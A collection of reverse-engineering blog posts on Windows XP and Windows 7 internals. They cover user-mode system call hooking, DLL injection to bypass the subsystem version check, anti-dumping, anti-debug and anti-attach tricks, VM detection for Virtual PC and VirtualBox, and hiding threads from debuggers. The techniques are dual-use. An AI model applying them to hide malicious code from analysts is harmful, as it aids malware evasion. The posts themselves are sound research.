Reading view

There are new articles available, click to refresh the page.

Native x86 User-mode System Calls Hooking

In this post i am going to explain how to implement system call hooking from user-mode for native x86 processes (i here refer to 32-bit processes running in 32-bit versions of Windows XP SP2 and SP3).

Let's have a look at the "ZwOpenProcess" function of Windows XP SP2 and of Windows XP SP3.

1) XP SP2


2) XP SP3

As you can see in the images above, EAX is set to 0x7A, the system call ordinal and EDX is made to point at 0x7FFE0300 in the _KUSER_SHARED_DATA page. Then comes a CALL instruction which jumps to the "KiFastSystemCall" function whose address is stored in 0x7FFE0300 (_KUSER_SHARED_DATA::SystemCall).

One difference we can see is that SYSENTER of XP SP2 is followed by 5 NOPs while in XP SP3 SYSENTER is directly followed by the RET of the "KiFastSystemCallRet" function.
 
The first thing one may think of to implement the user-mode system call hook in Windows XP SP3/SP2 is to overwrite the "_KUSER_SHARED_DATA::SystemCall" and "_KUSER_SHARED_DATA::SystemCallRet" fields. Unfortunately, this is not possible since the page is not writable and any attempt to change its memory protection constant always fails.

So, we should now turn to the "KiFastSystemCall" function and try to overwrite its very first instruction with a JMP instruction. Is this all? Let's see.

For XP SP2, it is okay to write a near jmp instruction (5-byte long) since we have enough space (filled with 5 NOPs) and this does not hurt the RET instruction of the "KiFastSystemCallRet" function. But for XP SP3, any attempt to write the near jmp instruction will hurt the "KiFastSystemCallRet" function. Any common method for both XP SP2 and SP3?

I thought about that and came up with something that worked for both service packs. If we allocate a memory page at an address which when converted from absolute to relative gives 0xC3 as the fifth byte of the new JMP instruction. For example, if we allocate a memory page at 0x3F910000, given that the "KiFastSystemCall" function is at 0x7C90E510, we get the new JMP instruction as a sequence of
 "\xE9\xEB\x1A\x00\xC3". You can check the source code of InjectHookLib for more information.

N.B. We can still use a short JMP by searching for any vacant 5 bytes in the range of -128 to +127 from the address of the "KiFastSystemCall" function. LEA ESP,[ESP] seems to be okay for both service packs.

N.B. With certain processors or under certain conditions e.g. disabled VT-x/AMD-V if using VirtualBox, the "KiFastSystemCall" function is not used at all and the "KiIntSystemCall" is used instead. In these cases, you can safely overwrite the first instructions of "KiIntSystemCall" function with a near JMP instruction as long as the code you hook to takes care of that.


Any ideas or suggestions are always very welcome.

You can follow me @waleedassar

Major / MinorSubsystemVersion

If you are still using Windows 2000, you must have noticed that certain executables refuse to run. Actually, this is due to the executables being built with Microsoft Visual Studio 2010 which sets the MajorSubSystemVersion and MinorSubsystemVersion in the PE header to 5 and 1. In other words, it creates executables to run on Windows XP (5.1) and above. This causes Windows 2000 (5.0) to refuse to load these executables.

Now, let's see where the check occurs and how to bypass it. The first place to check must be the kernel32 "CreateProcess" function.


If we start at address 0x7C4F1ECE, we can see a call to the ntdll "ZwQuerySection" function with the "InformationClass" parameter set to 1 (SectionImageInformation). After the "ZwQuerySection" function has returned successfully, the "SECTION_IMAGE_INFORMATION" structure should be filled with some useful data. Among the data returned are the executable's subsystem type and minor and major versions.

Then comes a check for the subsystem type. The subsystem type must be either GUI (IMAGE_SUBSYSTEM_WINDOWS_GUI) or console (IMAGE_SUBSYSTEM_WINDOWS_CUI). If it is not any of these two types, the "CreateProcess" function fails.


As you can see in the image above, at address 0x7C4F1F91, the major and minor subsystem versions extracted from the PE header via the "ZwQuerySection" function are passed to the "CheckSubSystem" function. If the "CheckSubSystem" function returns TRUE, the "CreateProcess" function proceeds and if it returns FALSE, the "CreateProcess" function fails as such. Now, let's check this function.


As you can see in the disassembly and C-code in the three images above, if the subsystem versions extracted from the PE header are less than 3.10, the "CheckSubsystem" function returns FALSE. Then comes the important part, if the "MajorSubsystemVersion" extracted from the PE header is greater than the value of the "NtMajorVersion" field (The field is at offset 0x26C from the _KUSER_SHARED_DATA page), the function fails. The same applies for "MinorSubSystemVersion" if "MajorSubsystemVersion" and "NtMajorVersion" are equal.

N.B. NtMajorVersion and NtMinorVersion are usually the same as the OS version info. returned by the kernel32 "GetVersion" or "GetVersionEx" functions.

As a developer, bypassing the check can easily be done by using Platform Toolset v9 in microsoft visual studio (thanks @skier_t) or by directly editing the PE header of the executable using any PE Editor. 

Imagine the scenario where the executable in question has CRC check upon its PE header as part of the implemented protection scheme. In this case, as a user, you won't be able to run the executable since any attempt to edit the PE header will cause the CRC check to fail. This leads us to find a system-wide solution. Yes, patching.

Speaking of patching, we have two options:

1) The first is to patch a couple of addresses inside the "CheckSubSystem" function (Actually, i don't recommend patching the return value check).

To implement the check bypass, i created  a dynamic link library, hooksubsystem.dll that once injected into a process bypasses the subsystem version check.

You can find the source code of hooksubsystem.dll here.
You can find hooksubsystem.dll here.

One drawback of this method is that it is Service pack-specific since the "CheckSubSystem" function is not exported by kernel32.dll.

2) The second is to patch the "ZwQuerySection" function such that we can manipulate the data returned in the "SECTION_IMAGE_INFORMATION" structure before being used by "CheckSubSystem" function.

To implement this method, i created another version of hooksubsystem.dll. You can find it here and its source code from here.

I also created a small application, BypassSubSystem.exe, which installs a system-wide hook of the type provided in the command line arguments. It can be used in the way you see in the image below.
BypassSubSystem.exe can be downloaded from here and its source code from here.

In a future post i will go deeper into this topic. 


You can follow me on Twitter @waleedassar

Anti-Dumping - Part 3

In this post i will share with you a couple of small tricks that can be deployed to harden or defeat memory dumping attempts. As i have just mentioned they are small tricks, so don't flame at me.

The first trick briefly involves appending a special section header to the section table of your executable. The new section header is to be set with a huge virtual size. Don't worry, this is not going to affect the file size (on disk) since we can set the raw size of the new section to zero (completely virtual section).

This results in the the "SizeOfImage" field of the IMAGE_OPTIONAL_HEADER structure being huge as well.

Unlike old anti-dumping tricks, we don't have to forge the "SizeOfImage" field of PEB.LoaderData or that in the PE Header memory page. Here, we give the dumping tools a huge value that they are very likely to fail to allocate using e.g. the "VirtualAlloc" function or its likes. Of course, this trick does not defeat dumping tools that read the memory of processes page by page.

Since the raw size of this huge section is zero, then the new section will be zero-initialized and the OS memory manager will throw it away making the memory usage of such process as smooth as possible.

It is now obvious that the new section should be left as it is. Your code should never read, write, or execute it. As any attempt to e.g. write to it results in the OS memory manager restoring the whole section into memory.

Here you can find a demo.

The second trick was first mentioned by Kris Kaspersky. The trick is very nice and simple. If we set the memory protection of one section as PAGE_GUARD, then the "ReadProcessMemory" function will fail usually with the system error code ERROR_PARTIAL_COPY, 0x12B. To defeat this trick, dumping tools are now using the "VirtualProtectEx" function to remove the PAGE_GUARD attribute, then read the section, and finally restore the PAGE_GUARD attribute.

To enhance this trick, i have created a watching thread that infinitely calls the "VirtualQuery" function and once it detects that PAGE_GUARD is removed from the section's memory protection attributes, it just terminates the process. Here is the code and here is a demo.

N.B. For the second trick to be effective, you should place the sections you want to protect after the PAGE_GUARD section so that the process terminates before them being dumped.

N.B. The second trick theoretically has better chances to work on multi-processor systems than on single-processor ones.

Any comments or ideas are very welcome.

You can follow me on Twitter @waleedassar

PAGE_EXECUTE_WRITECOPY As Anti-Debug Trick

In this post, i will share with you a poorly discussed anti-debug trick that i may be the first one to discover or disclose.

Now let's start with a quick introduction. If a memory page with the "PAGE_EXECUTE_READWRITE" access protection attributes is requested from the OS, then a page with the "PAGE_EXECUTE_WRITECOPY" attributes, not the "PAGE_EXECUTE_READWRITE" attributes is given.   

The reason for that behavior is so simple, that is, the OS memory manager wants to physically share the page between all the process instances (since it is guaranteed to be the same in all the process instances before any write).

Once you make the first write to the new page, the OS assigns a private copy of the page to the process in which the write occurrs and the page attributes change to PAGE_EXECUTE_READWRITE.

N.B. The same applies to pages requested with the PAGE_READWRITE attributes. They are initially given the "PAGE_WRITECOPY" attributes and after the first write, they turn into PAGE_READWRITE.

N.B. PAGE_EXECUTE_WRITECOPY and PAGE_WRITECOPY are not valid parameters to the "VirtualAlloc" or "VirtualAllocEx" function.

Now if you have a section in your executable with the read, write, and execute access attributes (See section xyz in the image below), then the abovementioned applies to it.
The access protection attributes given to section xyz causes its memory page to be mapped with the "PAGE_EXECUTE_WRITECOPY" attributes. See image below.
If we design section xyz in a way that it is never written to (e.g. does not contain self-modifying code) throughout the whole lifetime of the process, then the page will always be PAGE_EXECUTE_WRITECOPY even at process exit.

If the attributes change to PAGE_EXECUTE_READWRITE, that means the page must have been written to e.g. when another process, mostly a debugger, had called the "WriteProcessMemory" function while stepping-over, tracing-over, or placing software breakpoints. That definitely means the process is being debugged. See images below.

Now our executable of question can call the "VirtualQuery" function to check the page protection attributes of section xyz. If it is something other than PAGE_EXECUTE_WRITECOPY, then a debugger is present and the process should quit.

The good thing about this trick is that, unlike the 0xCC-scanning trick, it can detect software breakpoints even if there are no longer active (removed by the debugger).

Also, most debuggers in their default settings are used to place software breakpoints on modules' entry points, which means the page protection attributes change even before the reverse engineer starts to debug the module.

A common way to bypass this trick for stepping-over and tracing-over is to use hardware breakpoints which is an available option in OllyDbg v1.10 and OllyDbg v2.01 (alpha 4).

A simple demo can be found here and its source code from here.

Any ideas or comments are very welcome.

You can follow me on Twitter @waleedassar

Virtual PC Machine Reset

While playing with Virtual PC 2007, i came up with an interesting trick not only to detect Virtual PC 2007 but also to reset (restart) the Virtual Machine.

The trick is so simple that all you need to do in your code is execute "\x0F\xC7\xC8\x05\x00"

Executing that x86 instruction sequence causes the following message to pop up.
A POC can be found here and its source from here.

N.B. Other x86 instruction sequences can cause the same result.

Any comments or ideas are welcome.
You can follow me on Twitter @waleedassar

Virtual PC vs. Resume Flag

In this post i will show you another weird behavior of Virtual PC 2007. I encountered this weird behavior while playing with Virtual PC 2007 with Windows XP SP3 installed inside. The behavior is all about how a Windows XP Virtual PC virtual machine handles the Resume Flag.

For those who don't know, the Resume Flag (Flag no. 16 in the EFLAGS register) is used to temporarily disable Hardware Breakpoints exceptions for one instruction. Without it, a Hardware-Breakpoint-On-Execution would infinitely trigger an EXCEPTION_SINGLE_STEP exception.

According to @osxreverser, Windows XP does not support the Resume Flag (RF). I was also amazed to see that also WinDbg and OllyDbg v1.10 don't use the resume flag. They use the Trap Flag (TF) instead.

Running a simple executable that on purpose makes use of the Resume Flag inside an XP Virtual PC Virtual Machine, i found out that execution flows normally as if XP supports the resume flag.

Given the finding above, i created a small executable that tries to detect if it is running inside Virtual PC 2007.
You can find it here and its source code from here.

I guess the finding above only applies if the host operating system itself supports the resume flag e.g. Windows 7 or later.

N.B. This topic is still under research.

Please don't hesitate to leave a comment.
You can also follow me on Twitter @waleedassar

Virtual PC vs. DR7

In this post i will show you another weird behavior of Virtual PC 2007. This time the trick is about how Virtual PC handles the debug register DR7 known as Debug Control register.

For those who don't know, DR7 is used to specify the conditions under which the EXCEPTION_SINGLE_STEP exception is triggered for addresses held in DR0-DR3.
If we want to dissect DR7, it would be as follows:
Bit 0     ---> DR0 is locally enabled.
Bit 1     ---> DR0 is globally enabled.
Bit 2     ---> DR1 is locally enabled.
Bit 3     ---> DR1 is globally enabled.
Bit 4     ---> DR2 is locally enabled.
Bit 5     ---> DR2 is globally enabled.
Bit 6     ---> DR3 is locally enabled.
Bit 7     ---> DR3 is globally enabled.

Bit 8     ---> The "Local Enable Bit". Also for "Last Branch" tracing.
Bit 9     ---> The "Global Enable Bit". Also for "Last Branch" tracing.
Bit 10   ---> Reserved.
Bit 11  ----> Reserved.
Bit 12 -----> IR
Bit 13 -----> GD
Bit 14 -----> TB
Bit 15 -----> TT

Bit 16 -----
                  | ----> When DR0 is triggered.
Bit 17 -----
Bit 18 -----
                  | ----> Size of DR0's trigger condition.
Bit 19 -----
Bit 20 -----
                  | ----> When DR1 is triggered.
Bit 21 -----
Bit 22 -----
                  | ----> Size of DR1's trigger condition.
Bit 23 -----

Bit 24 -----
                  | ----> When DR2 is triggered.
Bit 25 -----
Bit 26 -----
                  | ----> Size of DR2's trigger condition.
Bit 27 -----
Bit 28 -----
                  | ----> When DR3 is triggered.
Bit 29 -----
Bit 30 -----
                  | ----> Size of DR3's trigger condition.
Bit 31 -----

For example:
Imagine we want to place a Hardware-Breakpoint-On-Execution for an instruction at 0x401000. See image below.

What the debugger does in this case is:
1) Sets DR0 to 0x401000.
2) Sets bit 0 of DR7 to 1.
3) Sets bit 8 of DR7 to 1 (for backward compatibility).
4) Sets bits 16 and 17 of DR7 to 00 (00 means On-Execution).

And if we then want to place a Hardware-Breakpoint-On-Write-Four for memory at 0x10000. See image below.
What the debugger does in this case is:
1) Sets DR1 to 0x10000.
2) Sets bit 2 of DR7 to 1.
3) Sets bit 8 of DR7 to 1 (for backward compatibility).
4) Sets bits  20 and 21 of DR7 to 01 (01 means On-Write).
5) Sets bits  22 and 23 of DR7 to 11 (11 for the size of trigger condition means to watch four bytes).

Now let's try to get back to the main topic of this post.

Hereafter, i will call the second byte of DR7 (byte 0xBB of 0xDDCCBBAA) the flags byte, just for brevity.

On Windows XP, if we set the flags byte to any value ranging from 0x00 to 0xFF, the breakpoint is always active and the exception is always raised whenever the trigger condition is met e.g. if we set DR7 to 0x0000FF01 (a hardware breakpoint On-Execution with Local enable, global enable, reserved, reserved, IR, GD, TB, and TT bits set), the exception is raised whenever the address in DR0 executes.
The same applies for Windows 7.

What about Virtual PC 2007? 

In Virtual PC 2007 with Windows XP installed inside, with certain flags set in DR7 e.g. 0x00003F01, the breakpoint is sometimes not activated.

So, i created simple executable that brute-forces the DR7's flag byte and based on the number of times the exception is raised it determines whether it is running inside Virtual PC 2007.

You can download the demo from here and its source code from here.
 
N.B. It has been tested with Windows XP SP2 and SP3.
N.B. VirtualBox is also affected, but i will leave this for a future post.


Any comments or ideas are very welcome. You can also follow me on Twitter @waleedassar

Virtual PC vs. CPUID

In this post i will show another weird behavior of Virtual PC 2007. This time it is about the CPUID instruction. As most of you already know well what the CPUID is for and how it works, i will directly jump into the main topic.

In Virtual PC, executing CPUID disables interrupts for one instruction. Oh, wait, how is that?

Imagine we want to trace a sequence of x86 instruction. What the debugger does in that situation is as follows:
1) Calls the "GetThreadContext" function to extract the current context of the thread executing this sequence of instructions.
2) Modifies the "EFLAGS" register of the "CONTEXT" structure such that the Trap flag (TF) is set. EFLAGS is situated at offset 0xC0 from the start of the structure for the x86 version. TF is bit number 8 (0x100).
3) Calls the "SetThreadContext" and "ContinueDebugEvent" functions to continue execution.

When the trap flag is set, after executing an x86 instruction, an exception EXCEPTION_SINGLE_STEP is raised and trap flag is cleared.

The debugger receives the exception and resets the trap flag as shown above and so on.

Disable interrupts, what does that mean?
Executing certain instructions when the trap flag is set, no EXCEPTION_SINGLE_STEP exception is raised. The exception is raised after executing the instruction following them. One example instruction that disables interrupts is POP SS. POP SS has been used for a long time as an anti-tracing trick. Since it disables interrupts for one instruction, dumping the EFLAGS register to stack via . PUSHFD reveals the Trap Flag.


Executing CPUID in Virtual PC 2007, i found out that it has the same effect as POP SS. CPUID disables interrupts for one instruction.

I created a simple demo that exploits this bug to detect whether it is running inside Virtual PC 2007. It has been tested on Windows XP SP2 running inside Virtual PC 2007.

Reason for that is still under research but it seems to be due to the Virtualized CPUID (Intel FlexMigration) hardware support since the trick only works if Hardware Virtualization is enabled.

You can download the demo from here and its source code from here.

N.B. VirtualBox v4.1.22 r80657 is also affected by this bug.

N.B. Parallels Desktop is reportedly affected by this bug.

You can follow me on Twitter @waleedassar.

SizeOfStackReserve As Anti-Attaching Trick

In this post i will show you a new anti-attaching trick that has been tested on Windows 7. It does not work on Windows XP due to the changes Microsoft introduced in the way threads are created.

Let's first see how thread creation in Windows 7 is different from that of Windows XP.

In Windows XP, whenever you call the kernel32 "CreateRemoteThread" or the ntdll "RtlCreateUserThread" function to create a new thread, the following occurs underneath:

The kernel32 "BaseCreateStack" or ntdll "RtlpCreateStack" function is called in case of  "CreateRemoteThread" or "RtlCreateUserThread" successively to allocate space for the new thread's stack in the address space of the target process.

N.B. The kernel32 "CreateThread" function is only a call to the kernel32 "CreateRemoteThread" function with the "hProcess" parameter set to -1.

Since there is no big difference between the "BaseCreateStack" and "RtlpCreateStack" functions, it is enough for us to take the "BaseCreateStack" function in disassembly in this post.

The "BaseCreateStack" function takes four parameters, only three of them are of interest. The first parameter is the handle to the process in which we are about to allocate user stack memory. The second parameter is the size in bytes of user stack memory to COMMIT into the target process's address space. The third parameter is the size in bytes of user stack memory to RESERVE into the target process's address space. Hereafter, i will refer to them as hProcess, CommitSize, and ReserveSize.

N.B. If you call the "CreateRemoteThread" function with the "dwStackSize" parameter set to e.g. 0x10000, then BaseCreateStack commits 0x10000 bytes. On the other side, if the "CreateRemoteThread" function is called with the "dwCreationFlags" parameter having the "STACK_SIZE_PARAM_IS_A_RESERVATION" flag set, then BaseCreateStack Reserves 0x10000.

Now, let's dive into the "BaseCreateStack" function and see what is going on inside.

1) It extracts the value of ImageBase from the PEB of the process in which it is called, the value is then passed to the "RtlImageNtHeader" function. If the "RtlImageNtHeader" function fails an error ERROR_BAD_EXE_FORMAT is returned.


2)
If the "ReserveSize" parameter passed to it is zero, it uses the value of the "SizeOfStackReserve" field of the IMAGE_OPTIONAL_HEADER structure.



3) Similarly, If the "CommitSize" parameter passed to it is zero, it uses the value of the "SizeOfStackCommit" field of the IMAGE_OPTIONAL_HEADER structure. Please remember that the values are extracted from the PE header of the main executable of the process that is calling the "CreateRemoteThread" function, not the target process.



4) It then makes some sanitization checks on the ReserveSize and CommitSize, for example to ensure that the commit size is never greater than the reserve size. It also checks to ensure that the commit size is never lower than the value of the "MinimumStackCommit" field of PEB.




5) It calls the "ZwAllocateVirtualMemory" function to reserve memory of size ReserveSize into the address space of the target process with the PAGE_READWRITE protection attribute.


6) It calls the "ZwAllocateVirtualMemory" function to commit CommitSize+0x1000 of the memory reserved in the previous step.



7) The extra page committed in the previous step is then given the PAGE_GUARD protection attribute.


Here is a similar reversed code of the "BaseCreateStack" function. From here.


The reason why a PAGE_GUARD page always exists at the end of committed stack is for the kernel to be notified each time the stack needs to be expanded. For example, if a thread tries to touch its stack's PAGE_GUARD page, an STATUS_GUARD_PAGE_VIOLATION exception is raised and swallowed by the kernel and it automatically commits one more page.

N.B. If a thread tries to touch the PAGE_GUARD page of another thread's stack, the exception is passed to the application or the debugger.

After the stack has been allocated in the target process's address space, the "CreateRemoteThread" function formulates a CONTEXT structure for the new thread. After the previous steps have completed successfully, the "ZwCreateThread" function is called to initiate the new remote thread.

Now let's see how threads are created in Windows 7.

In Windows 7, if we take the "CreateRemoteThread" or "RtlCreateUserThread" function into disassembly, we will see that the "dwStackSize" is directly passed to the "ZwCreateThreadEx" function.
So, our first assumption here is that stack allocation is now forwarded to the kernel. Also, we can note that now in later versions of Windows than XP, the "ZwCreateThreadEx" function is by default used for thread creation instead of the "ZwCreateThread" function.

Now let's check the "NtCreateThreadEx" function in ntoskrnl.exe.

We can easily see in "NtCreateThreadEx" a call to the "PspCreateThread" function.
The "PspCreateThread" function calls the "PspAllocateThread" function which calls "RtlCreateUserStack" function.


The "RtlCreateUserStack" function is called after attaching to the target process's address space. Now let's look at the "RtlCreateUserStack" function in disassembly.

Now it is easy to see that it reads the PE header from the main executable of the process in which the remote thread is being created unlike XP where information was extracted from the main executable of the process that creates the thread. Yeah, it seems Microsoft fixed a very minor issue.


From the image above, it is also easy to conclude that if we forced the "RtlImageNtHeader" function to fail, we can prevent any foreign process including the debugger from attaching to our process. The easiest way to accomplish that is by erasing the PE header at runtime.  Any call to ZwCreateThreadEx as part of calling the "DebugActiveprocess" function (Used for attaching to a running process) would fail. For more information and examples, please refer to my previous post.

N.B. DebugActiveProcess calls DbgUiIssueRemoteBreakin which calls ~RtlCreateUserThread which calls "ZwCreateThreadEx".

One may say, "Erasing the whole PE header may render many APIs which read from the PE header useless e.g. FindResource or GetProcAddress". My answer will be "Yes, you are right".

So, we should find a smarter way to do it.

Okay, let's continue disassembling the "RtlCreateUserStack" function.


As you can see in the image above if the size of stack commit argument passed to it is zero, it takes the value of the "SizeOfStackCommit" field from the PE header. The same measure is taken if the size of stack reserve passed is zero. It is also noteworthy that if both the size of stack commit argument passed and "SizeOfStackCommit" of the PE header are zero, the commit size becomes 0x4000 (The default commit size is 0x4000).

The function then checks the size of stack commit against the size of stack reserve. If the size of stack commit happens to be greater, then the size of stack reserve is adjusted to be greater.

The function then ensures that the size to be committed is not less than the "MinimumStackCommit" field of  the process's PEB. If it is less, the size to be committed is adjusted.


The function then calls the "ZwSetInformationProcess" function with the "ProcessInformationClass" parameter set to 0x29 (ProcessThreadStackAllocation). The size to be reserved is passed in the 4th member of the structure passed in the "ProcessInformation" parameter.

Now let's quickly have a look at the "NtSetInformationProcess" function.

As you can see in the two images above, the value of the 4th member of the structure passed to the "ZwSetInformationProcess" function is used as the "RegionSize" parameter passed to the "ZwAllocateVirtualMemory" function.

Given this knowledge, if we at runtime change the value of the "SizeOfStackReserve" field of the PE header to a huge value, then we can cause the "ZwAllocateVirtualMemory", "ZwSetInformationProcess", "RtlCreateUserThread", "PspAllocateThread", "PspCreateThread", and "NtCreateThreadEx" functions to successively fail preventing any foreign processes including debuggers from creating any thread in our process.

A demo can be found here and its source code from here.

Any comments or ideas are more than welcome.

You can follow me on Twitter @waleedassar

Defeating Memory Breakpoints

In this post i will show you a couple of tricks that can be used to defeat memory breakpoints. First i should explain what memory breakpoints are and how they work.

Anyone who has spent some time in the field of software protection and debuggers must have heard of Memory breakpoints. Actually, memory breakpoints were not extensively used in the past but since more and more protection schemes implement anti-INT3 and anti-Hardware breakpoints tricks, reverse engineers started to use memory breakpoints to avoid detection.

The idea of memory breakpoints is so simple. Imagine that we want to place a memory breakpoint at address 0x402005 (On-Execution), what the debugger theoretically does is as follows:

1) Marks the memory page which the address 0x402005 belongs to (page 0x402000) as guarded via calling the "VirtualProtectEx" or "ZwProtectVirtualMemory" function with the "flNewProtect" parameter having the "PAGE_GUARD" protection attribute set. In this case page 0x402000 is originally PAGE_EXECUTE_READ 0x20 and after placing the memory breakpoint it becomes PAGE_EXECUTE_READ|PAGE_GUARD 0x120.

2) Each time the guarded page is touched whether read from, written to, or executes, then an exception STATUS_GUARD_PAGE_VIOLATION 0x80000001 is raised and the debugger receives a debug event of type  EXCEPTION_DEBUG_EVENT.

3) The debugger then inspects various fields in the "EXCEPTION_RECORD" structure of the "DEBUG_EVENT" structure to determine the reason why the exception was raised.
If the following conditions are met, then the debugger figures out that instruction at 0x402005 is about to execute i.e. breakpoint reached and that it should break accordingly.
a) The "ExceptionCode" field is set to STATUS_GUARD_PAGE_VIOLATION 0x80000001. b) The "NumberParameters" field is greater than or equal to 2. c) The "ExceptionInformation[0]" field is set to 8. d) The "ExceptionInformation[1]" field is set to 0x402005. The image below represents something very similar.


If any of the above mentioned conditions is not met, then the debugger figures out it is not the breakpoint. Whether the breakpoint is hit or not, the debugger resets the "PAGE_GUARD" protection attribute.

Surprisingly, even though this is the typical way debuggers should implement memory breakpoints, OllyDbg and many other user-mode debuggers implement memory breakpoints in a slightly different way.

Let's first take OllyDbg v1.10 and see how it implements memory breakpoints.

If you already use OllyDbg v1.10, you should already know that it has only two kinds of memory breakpoints, On-Access and On-Write. On-Access memory breakpoints trigger anytime the page is touched and On-Write memory breakpoints trigger anytime the page is written to.

Trying to reverse OllyDbg v1.10 to see how it implements each type, i found out that:

1) For On-Access memory breakpoints, they are implemented by marking the page that the breakpoint address belongs to as PAGE_NOACESS. PAGE_NOACCESS means that anytime the page is touched, an exception STATUS_ACCESS_VIOLATION is raised. The debugger then receives the debug event and inspects fields in the "EXCEPTION_RECORD" structure in a similar way to the conventional method mentioned above.

2) For On-Write memory breakpoints, they are implemented by depriving the page which the breakpoint address belongs to of the write access right via setting the "flNewProtect" parameter passed to the "VirtualProtectEx" function to PAGE_EXECUTE_READ. Every time the page is written to, an exception STATUS_ACCESS_VIOLATION is received. The debugger then receives the debug event and inspects fields in the "EXCEPTION_RECORD" structure in a similar way to the conventional method mentioned above. Here lies a bug in OllyDbg v1.10 since it assumes that the memory protection of any single page in the process address space can be turned into PAGE_EXECUTE_READ while this is not true for example memory page at 0x10000 can never be executable (Windows 7).

After we have seen how memory breakpoints are implemented, i will show you two tricks that can be used as anti-memory-breakpoints.

Trick 1)

Given the knowledge above, we can conclude that in order to defeat memory breakpoints esp. those of type On-Execution, we should cause the "VirtualProtectEx" function to fail. How is that possible?
By copying our code to a dynamically-allocated memory page whose page protection attributes can be executable and in the same time can not be guarded or no-access. This type of memory pages does really exist. For every thread you create, the kernel allocates one page (three pages in case of Wow64 processes) for the TEB. The TEB page(s) can't be non-writable and can't be assigned the "PAGE_GUARD" protection attribute. How can this be implemented?
All you have to do to implement this trick is call the "CreateThread" function with the "dwCreationFlags" parameter set to CREATE_SUSPENDED. At this point, we have the new thread's TEB with the page protection attributes set to PAGE_READWRITE. The next thing we should do is make the TEB page executable by calling the "VirtualProtect" function with the "flNewProtect" parameter set to PAGE_EXECUTE_READWRITE.

You can use this demo to test this trick.

N.B. For more stealthy way to conceal the point at which the page protection is changed to executable, use the "VirtualAlloc" function instead of "VirtualProtect". The allocation type in this case must be MEM_COMMIT only.

Trick 2)

This trick can easily detect memory breakpoints. It relies on the fact that the "ReadProcessMemory" function returns false if you try to read guarded or no-access memory. To use this trick, all you have to do is call the "ReadProcessMemory" function with the "Handle" parameter set to 0xFFFFFFFF, the "lpBaseAddress" parameter set to the image base, and the "nSize" parameter set to the size of image. If it returns false, then at least one memory breakpoint is present.

You can use this demo to test this trick.

N.B. Certain executables have gap inaccessible pages e.g. those pages intended for anti-dumping described in a previous post. So you have to take care of that if implementing this trick.

N.B. ReadProcessMemory has also been used as a stealthy way to read memory without triggering Hardware Breakpoints.


Any comments or ideas are very welcome.

You can follow me on Twitter @waleedassar





OllyDbg RaiseException Bug

In this post i will show you a bug in OllyDbg that can be used to detect its presence. The trick is so easy that all you have to do is call the "RaiseException" function with the "dwExceptionCode" parameter set to EXCEPTION_BREAKPOINT 0x80000003. The response depends on the OllyDbg version used. If it is v1.10, then the exception is going to be silently swallowed by the debugger and the registered exception handler is not called. In v2.01 (alpha 4), several message boxes pop up and the exception handler is not called either. Only v2.01 (beta 2) is immune to this bug.



The reason behind this bug is OllyDbg trying to read the x86 instruction pointed to by the "ExceptionAddress" field of the "EXCEPTION_RECORD" structure to ensure it is 0xCC or 0x03. In case of EXCEPTION_BREAKPOINT exceptions raised by explicitly calling the "RaiseException" function, the instructions at ExceptionAddress is definitely not 0xCC or 0x03.


You can find a demo here and its source code from here.

Any comments or ideas are very welcome.

You can follow me on Twitter @waleedassar

VirtualBox CPUID Discrepancy

In this post i will show you a weird issue i have lately found in VirtualBox. This issue is seen only if VirtualBox is running without hardware virtualization support (VT-x/AMD-V).

For example, when Windows XP is running in VirtualBox with no hardware virtualization support, it is forced to use INT 2E to make system calls instead of SYSENTER. This is because SYSENTER is apparently not supported by VirtualBox. The problem here is that in this case the CPUID instruction still detects supported SYSENTER/SYSEXIT instructions.

We can use this discrepancy to detect VirtualBox (only if running with no hardware virtualization). All we have to do is execute CPUID (Leaf 1) and if we have bit 0x800 of EDX set, then execute SYSENTER in the form of any system call e.g. ZwDelayExecution. If an EXCEPTION_ILLEGAL_INSTRUCTION 0xC000001D is raised, then VirtualBox is present.


You can find a demo here and source code from here.

Any comments or ideas are very welcome.

You can follow me on Twitter @waleedassar

Hidding Threads From Debuggers

In this post i will take into discussion an old anti-debug trick that many of us know well. The trick is the ability of our code to hide specific threads from debuggers. This is usually achieved by calling the ntdll "ZwSetInformationThread" function with the "ThreadInformationClass" parameter set to ThreadHideFromDebugger 0x11. Sample code for this trick can be found here.

If we take the "ZwSetInformationThread" function into disassembly, we can easily see that the "ThreadInformationLength" parameter must be zero for the function call to succeed, otherwise ERROR_BAD_LENGTH is returned. See image below.

 And here is the 64-bit version

As you can see from the two images above, the whole function call ends up setting the "HideFromDebugger" bit of the "_ETHREAD" structure. Once this flag has been set, the kernel guarantees that the debugger will never receive any debug events from the corresponding thread.

For example, let's take the LOAD_DLL_DEBUG_EVENT events. As you know, any time a module is loaded into the address space of specific process, the debugger is notified of this action through the LOAD_DLL_DEBUG_EVENT events.The debugger then inspects various interesting fields in the "LOAD_DLL_DEBUG_INFO" structure e.g. ImageBase. Depending on the debugger configuration, the debugger notifies you of that or not. You can see this if you instruct OllyDbg to break on new module.

The two images above show how OllyDbg acts if a normal (not hidden) thread loads a new DLL. It is as follows:
1) Thread Loads a new DLL via calling e.g. the "LoadLibrary" function.

2) The "LoadLibrary" function wraps up a call to the ntdll "ZwMapViewOfSection" function.

3) The kernel mode part of ZwMapViewOfSection calls the "DbgkMapViewOfSection" function.

4) The "DbgkMapViewOfSection" function queries both the "HideFromDebugger" bit of the "_ETHREAD" structure and the value of the "DebugPort" field of the "_EPROCESS" structure. If the "HideFromDebugger" bit is not set and the "DebugPort" field is set, then the function builds the "LOAD_DLL_DEBUG_INFO" structure and calls the "DbgkpSendApiMessage" function which is responsible for delivering the debug event to the attached debugger.
On the other side, if the "HideFromDebugger" bit is set, DbgkMapViewOfSection returns immediately without delivering the debug event. See images below.


N.B. Regarding the UN/LOAD_DLL_DEBUG_EVENT's, there are other factors that determine whether or not the debug event is going to be delivered to debugger e.g. the "SuppressDebugMsg" bit of the Thread Environment Block (TEB).

5)  In the debugger, the "WaitForDebugEvent" function returns with the "dwDebugEventCode" field set to LOAD_DLL_DEBUG_EVENT 0x6. Given this, the debugger figures out that a new module has just been loaded and that it should inspect the "LOAD_DLL_DEBUG_INFO" structure to extract the new image base, file handle, etc.

6) After extracting info. from the "LOAD_DLL_DEBUG_INFO" structure, the debugger calls the "ContinueDebugEvent" function to continue executing the thread.

Similar to LOAD_DLL_DEBUG_EVENT's, debuggers never get notified of exceptions raised in the scope of hidden threads. To ensure that let's have a look at the "DbgkForwardException" function.

As you can see in the image above, the "HideFromDebugger" bit of the "_ETHREAD" structure is queried here as well.

Conclusion: When the "HideFromDebugger" bit flag of the "_ETHREAD" structure is set, the thread will not receive any debug events.

